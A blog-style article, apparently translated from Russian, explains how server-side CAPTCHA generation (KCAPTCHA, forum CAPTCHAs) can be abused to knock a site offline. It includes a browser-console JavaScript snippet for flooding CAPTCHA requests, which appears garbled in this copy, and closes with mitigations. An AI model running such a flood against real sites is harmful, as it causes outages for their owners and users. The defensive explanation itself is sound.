DoS attack on sites with their own captcha

You can find a lot of sites that are protected from all kinds of external unwanted automatic activity (bots) using captcha. And in many cases, the very same server on which the site is located is engaged in the generation of these same captchas. It’s very easy to screw such a captcha onto the site, and there are free captcha-generating libraries ( KCAPTCHA , for example).

What is the danger?

If there is a chance that your site will have enemies (for example, you are the owner of www.piratepay.ru ), then using such a captcha you risk helping them a lot - it becomes very easy to disable a site using even one client computer.

Why?


Captcha generation is quite resource-intensive, especially when you consider that PHP (or another language that is not very suitable for image processing) does this.

For example, in the above-mentioned KCAPTCHA, a picture is collected from fragments of a pre-rasterized font (which is stored as a picture), for example:



There are several such font files (in the standard “delivery” - 22), with each request, a directory is looked through and one of the files is selected randomly.

After bonding randomly selected characters, they distort. In this case, the wave distortion filter, written in PHP + GD2, is used.

for($x=0;$x<$width;$x++){
  for($y=0;$y<$height;$y++){
    $sx=$x+(sin($x*$rand1+$rand5)+sin($y*$rand3+$rand6))*$rand9-$width/2+$center+1;
    $sy=$y+(sin($x*$rand2+$rand7)+sin($y*$rand4+$rand8))*$rand10;
    if($sx<0 || $sy<0 || $sx>=$width-1 || $sy>=$height-1){
      continue;
    }else{
      $color=imagecolorat($img, $sx, $sy) & 0xFF;
      $color_x=imagecolorat($img, $sx+1, $sy) & 0xFF;
      $color_y=imagecolorat($img, $sx, $sy+1) & 0xFF;
      $color_xy=imagecolorat($img, $sx+1, $sy+1) & 0xFF;
    }
    /* ... */
    imagesetpixel($img2, $x, $y, imagecolorallocate($img2, $newred, $newgreen, $newblue));
  }
}


Those. all this happens rather slowly. No caching is provided by default. The same applies to many other libraries (including the forum ones: phpBB, vBulletin, etc.).

If there are a lot of requests for captcha generation, the server will not have time to draw captcha and give ordinary pages (especially considering that most often the site runs on any CMS and caching is turned off for various reasons).

Attack


In the simplest case, it’s enough to go to the site in your favorite browser (just in case referer is correct), open the javascript debugger and write something like this to the console:

cnt = document.getElementById('content'); /* любой элемент с id */
regen = function() {
  var html = '';
  for (var i = 0; i < 1000; i++) {
    html +=
      ''; 
  }
  cnt.innerHTML = html;
};
window.setInterval(regen, 10 * 1000);
regen();
/* следующее — просто украшательство, для того, чтобы постоянно видеть низ страницы */
window.setInterval('window.scrollTo(0, document.body.scrollHeight);', 500);


As a result, we got a multithreaded download of an infinite number of captchas for free (with their generation on a poor server). It is clear that not every server can stand it, many (from voluntarily checked) fall out with HTTP Error 503 Service unavailable.

Conclusion

There are several obvious ways to prevent this kind of attack:
  • use reCaptcha
  • check the number of captcha requests from each IP address, with the same session identifier, etc.
  • keep a certain amount of captcha generated in the cache (100, 1000, ... - depends on the number of requests), give them through something fast (nginx), periodically rebuild the cache
  • Use reliable text captcha, preferably taking into account the specifics of your site (for example, sin (30 °) = ...)
  • your option


PS do not use the "forum" captcha at all, because they are very weak - replace them with reCaptcha; if you use text captcha, make sure that the number of options is large enough.

Also popular now: